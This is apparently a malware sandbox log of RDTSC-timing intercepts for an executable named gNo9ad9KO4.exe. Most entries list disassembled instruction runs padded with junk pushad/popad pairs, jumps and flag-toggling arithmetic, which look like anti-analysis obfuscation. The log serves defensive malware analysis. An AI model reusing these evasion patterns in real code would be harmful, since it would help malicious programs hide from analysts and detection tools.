Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 45BC55 second address: 45BC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4688C1B771h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 461552 second address: 461557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 461557 second address: 46156D instructions: 0x00000000 rdtsc 0x00000002 je 00007F4688C1B768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F4688C1B76Eh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 46156D second address: 46157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 46157C second address: 4615A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 462D69 second address: 462D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5450019 second address: 545001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545001F second address: 54500C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 jmp 00007F4688C929DBh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4688C929E4h 0x0000001f xor ch, FFFFFFF8h 0x00000022 jmp 00007F4688C929DBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F4688C929E8h 0x0000002e adc cl, 00000058h 0x00000031 jmp 00007F4688C929DBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d call 00007F4688C929E2h 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430E3F second address: 5430E94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, F4DDh 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B76Ah 0x00000013 add eax, 6966C738h 0x00000019 jmp 00007F4688C1B76Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F4688C1B779h 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4688C1B76Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430E94 second address: 5430EC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C929DEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430EC0 second address: 5430EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430EC4 second address: 5430ECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470F4E second address: 5470F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410144 second address: 5410185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 24B112F2h 0x00000008 mov dh, 6Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 mov bl, 48h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4688C929E2h 0x0000001e xor ax, 4138h 0x00000023 jmp 00007F4688C929DBh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b movzx eax, bx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C3F second address: 5430C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C45 second address: 5430C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C49 second address: 5430C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C1B76Eh 0x00000010 sub si, 1D28h 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C7B second address: 5430C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C7F second address: 5430C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C83 second address: 5430C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C89 second address: 5430C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C9C second address: 5430CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C929E5h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F4688C929DEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430CD1 second address: 5430CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543087A second address: 54308BE instructions: 0x00000000 rdtsc 0x00000002 mov ch, C0h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4688C929E5h 0x0000000c and ax, 9836h 0x00000011 jmp 00007F4688C929E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4688C929DDh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430776 second address: 543078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430569 second address: 54305BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f mov dx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4688C929E5h 0x0000001e xor ecx, 31D1AE16h 0x00000024 jmp 00007F4688C929E1h 0x00000029 popfd 0x0000002a mov cx, 0087h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305BA second address: 54305C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305C0 second address: 54305C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305C4 second address: 54305D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305D2 second address: 54305DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 08A85249h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440188 second address: 54401BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b sub ah, FFFFFFCEh 0x0000000e jmp 00007F4688C1B779h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54401BF second address: 54401C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, AAh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54401C6 second address: 544023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B771h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4688C1B771h 0x0000000f adc cx, 0D66h 0x00000014 jmp 00007F4688C1B771h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B76Fh 0x0000002a sbb al, FFFFFF9Eh 0x0000002d jmp 00007F4688C1B779h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470E4B second address: 5470E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4688C929E6h 0x00000011 add cx, 5F78h 0x00000016 jmp 00007F4688C929DBh 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470E8C second address: 5470E9B instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470E9B second address: 5470EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470EA1 second address: 5470EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470EA7 second address: 5470EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470EAB second address: 5470EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545037F second address: 5450457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 jmp 00007F4688C929E3h 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a pushfd 0x0000001b jmp 00007F4688C929DDh 0x00000020 sub esi, 5CA0D0C6h 0x00000026 jmp 00007F4688C929E1h 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f call 00007F4688C929E7h 0x00000034 mov ecx, 79290B5Fh 0x00000039 pop esi 0x0000003a popad 0x0000003b xchg eax, ebp 0x0000003c jmp 00007F4688C929DEh 0x00000041 mov ebp, esp 0x00000043 jmp 00007F4688C929E0h 0x00000048 mov eax, dword ptr [ebp+08h] 0x0000004b jmp 00007F4688C929E0h 0x00000050 and dword ptr [eax], 00000000h 0x00000053 jmp 00007F4688C929E0h 0x00000058 and dword ptr [eax+04h], 00000000h 0x0000005c pushad 0x0000005d mov ebx, eax 0x0000005f mov ch, 4Eh 0x00000061 popad 0x00000062 pop ebp 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5450457 second address: 545045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545045B second address: 5450490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F4688C929E8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54306D6 second address: 54306DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54306DC second address: 54306E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54306E0 second address: 5430710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F4688C1B76Bh 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430710 second address: 5430716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440E68 second address: 5440F12 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4688C1B779h 0x00000008 adc cx, 3CD6h 0x0000000d jmp 00007F4688C1B771h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov di, cx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b jmp 00007F4688C1B778h 0x00000020 push eax 0x00000021 pushfd 0x00000022 jmp 00007F4688C1B771h 0x00000027 adc ah, FFFFFF96h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007F4688C1B76Ch 0x00000039 movzx ecx, bx 0x0000003c popad 0x0000003d xchg eax, ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F4688C1B778h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440F12 second address: 5440F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545020B second address: 545021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545021C second address: 5450251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov cx, 1F63h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4688C929E1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470661 second address: 5470670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470670 second address: 5470676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470676 second address: 547068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop ebx 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547068A second address: 5470722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F4688C929DBh 0x0000000f or esi, 7222CF9Eh 0x00000015 jmp 00007F4688C929E9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007F4688C929DEh 0x00000025 xchg eax, ecx 0x00000026 jmp 00007F4688C929E0h 0x0000002b push eax 0x0000002c pushad 0x0000002d push edx 0x0000002e movzx esi, di 0x00000031 pop edi 0x00000032 push ecx 0x00000033 movsx edi, si 0x00000036 pop esi 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 jmp 00007F4688C929DDh 0x0000003e mov eax, dword ptr [76FB65FCh] 0x00000043 pushad 0x00000044 mov cl, 02h 0x00000046 mov ecx, ebx 0x00000048 popad 0x00000049 test eax, eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F4688C929DEh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470722 second address: 5470734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470734 second address: 5470738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470738 second address: 5470776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA6DE98Ch 0x0000000e jmp 00007F4688C1B777h 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B775h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470776 second address: 54707E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4688C929E8h 0x00000015 adc ax, 87D8h 0x0000001a jmp 00007F4688C929DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F4688C929E8h 0x00000026 sbb al, 00000038h 0x00000029 jmp 00007F4688C929DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54707E4 second address: 5470813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470813 second address: 5470867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ror eax, cl 0x0000000c jmp 00007F4688C929E5h 0x00000011 leave 0x00000012 jmp 00007F4688C929DEh 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [001C2014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F468DF8324Ch 0x00000032 push FFFFFFFEh 0x00000034 pushad 0x00000035 jmp 00007F4688C929DDh 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4688C929DDh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470867 second address: 5470890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B777h 0x00000008 pop esi 0x00000009 mov dh, 73h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007F468DF0C017h 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470890 second address: 5470894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470894 second address: 5470898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470898 second address: 547089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547089E second address: 54708B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708B8 second address: 54708E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708E7 second address: 54708ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708ED second address: 54708F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708F1 second address: 5470920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C1B770h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470920 second address: 5470924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470924 second address: 547092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
